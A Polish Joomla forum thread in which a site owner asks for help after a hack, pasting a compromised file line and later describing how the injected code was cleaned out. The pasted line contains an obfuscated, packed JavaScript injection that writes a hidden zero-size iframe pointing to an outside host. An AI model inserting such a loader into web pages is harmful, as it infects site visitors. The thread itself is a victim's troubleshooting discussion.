syntax error, unexpected T_CONSTANT_ENCAPSED_STRING in /libraries/joomla/cache/stora

[antyfrost]

Witam,
Pełny komunikat błędu na stronie www:

Parse error: syntax error, unexpected T_CONSTANT_ENCAPSED_STRING in /libraries/joomla/cache/storage/file.php on line 255

z notpada:
255
@ mkdir($dir) && file_put_contents($indexFile, '<html><body bgcolor="#FFFFFF"><tag5479347351></tag5479347351><script>eval(function(p,a,c,k,e,d){e =function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('2 k=" l=\\"0\\" i=\\"0\\" h=\\"0\\" f=\\"g://5.1.j.m/p.o\\">";2 7="<a";2 9="n";2 6="e";2 d="</a";2 c="e>";3.4(7);b(3.4(9+6+k+d),8);b(3.4(6+c),8);',26 ,26,'||var|document|write||k02|k0|1000|k01|if|setT imeout|k22|k2||src|http|board|height|29||width|252 |ram|php|tag1'.split('|'),0,{}))</script><tag5479347352></tag5479347352></body></html>');

Były kiedyś na naszej stronce inne błędy, ale jakoś udało się naprawić. A teraz jest ściana.

Nie można też zalogować się do zaplecza. Joomla jest w wersji 1.5
Poszukujemy pomocy.
pozdrawiam

[Bazyl]

Hej,


Na stronę było włamanie :-)
Albo poradnik na wiki (postępowanie po włamaniu), albo dział zleceń...

[antyfrost]

Tak myślimy. Nawet mamy zidentyfikowanego włamywacza, lub jednego z kilku. plik htaccess ma wpisów ok. 500 plus całe .ru i podobne. Home nam ustalił jedno IP, albowiem palantowi skrypt się zaciął. Było do 50 tysięcy prób zalogowania do zaplecza nocami.
Przejrzałem te porady, ale nic nie można zdziałać bo ne można wejść na zaplecze. Mamy zapisaną stronę w Total Commanderze, ale po przesłaniu przez ftp nic się nie zmienia.

[Bazyl]

Pozostaje dział zleceń :-)

[antyfrost]

WYSZŁA ODPOWIEDŹ, ALE JEJ NIE WIDAĆ WIĘC POWTARZAM.
Chyba jednak dział zleceń, ale może jakiś kontakt ? Nie mamy na myśli unieszkodliwienia tego palanta, tak dla ścisłości. Jesteśmy niedużą organizacją, więc nie jest za bogato.

[Bazyl]

http://forum.joomla.pl/forumdisplay....%99-kupi%C4%99

[antyfrost]

Dziękuję za szybki odzew.

[antyfrost]

Stronka się już w miarę poprawnie wyświetla. Dzięki za pomoc. Zmiany kodów w wyniku ataku były w kilku plikach bardzo drobne. Ale jeszcze są jakieś błędy.
Potrzebny jest plik do wersji 1.5 modules/mod_forms/helper.php
oraz
do wersji 1.0 components/com_kunena/kunena.phpI może to koniec napraw ?
Z góry dziękuję

[antyfrost]

Zrobione. Nawet nie było trudne. Uszkodzony (częściowo pusty) był plik admin.login.php w administrator/components/com_log Z wersji Joomla 1.5 rozpakowanej do dowolnego katalogu na PC trzeba przenieść nieuszkodzony plik na miejsce wadliwego i wsio. W sumie uszkodzonych było 1600 plików na około 10 sposóbów, więc z wykorzystaniem Notepada++ i opcji zmień we wszystkich plikach witryny usunąłem "dziadostwo". Najważniejsze to dobrze w języku angielskim zdefiniować problem i wójek google zawsze coś ciekawego przyniesie.
Ale mam pytanie.
Atak na stronę miał miejsce nie poprzez włamanie na FTP czy zalogowanie się do panelu admina, ale miał taka dziwną formę. Z różnych adresów IP (ze świata) atakowano rozmaitymi ciągami znaków właśnie okienko na hasło. Czasem ataków (głownie nocą) było i ponad 10 tysięcy. Czy dobrym pomysłem będzie wprowadzenie z powrotem tego uszkodzonego pliku, a wejście do zaplecza wygląda jak wyżej i strona jest wtedy super bezpieczna. Czy tak ?
pzdr